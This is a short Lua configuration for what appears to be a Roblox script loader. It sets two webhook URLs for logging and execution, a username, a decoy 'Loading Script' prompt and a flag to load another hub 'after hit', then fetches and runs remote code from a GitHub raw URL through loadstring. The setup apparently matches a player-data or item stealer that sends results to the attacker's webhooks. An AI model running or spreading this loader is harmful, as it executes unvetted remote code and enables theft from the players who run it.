LogsWebhook = "https://webhook-protect.vercel.app/api/webhook?id=dldaZGVHeHYyVC10RWxRNzAtNFplUTpiM3REVEtHWjFxN3FNY3JoV183QXRIWllVcnotUWk5UlFfakZKaC1VNGV2bk5yNEdsS2JTZWVjNzFYNDhISGJKWnN6eDMxTEpoWk1RcHpfNEg4ZkVIcHJmQ1NKbWJmd0dYUUF4czNmQmc4OWFNM0hWTTVWeXZ4OHVJN25WVUZVRGJORS1Qamk3aER5RlBZYTdYX0MxRHRiUWZhbHB2T2NtY1V0Z3hsS0w1NzA"
ExecutionWebhook = "https://webhook-protect.vercel.app/api/webhook?id=VXVZdHl3VEtGS2w4VExpRldQUHpBZzp5MjdEMGNFZFEzejUxY1Z6S0lGN2haY1BzR01pWEE5NjRMRm5HMnBnYnJDRFlBZHlNaThFZWdXRDFpQVZPOF9hT0ZNZTdlYVpyNWliQ05hLXpyZzFOZ1cyZ0J5aldvTU5ud0JraWo2SnV0cWNlRHNiNWk1MUJmRFVMSU5ibFo0WXBPQzQxeEVaNXdQWEFZRnlkZ0Q0ZUliTWxRVVc0RG03UWdCcGJWZ1hsTkU"
Username = "adam345341"
PromptText = "Loading Script"
RandomizedPrompt = true
LoadRedzAfterHit = true

loadstring(game:HttpGet("https://raw.githubusercontent.com/lelel22f/Hm/refs/heads/main/SimpleTesting"))()
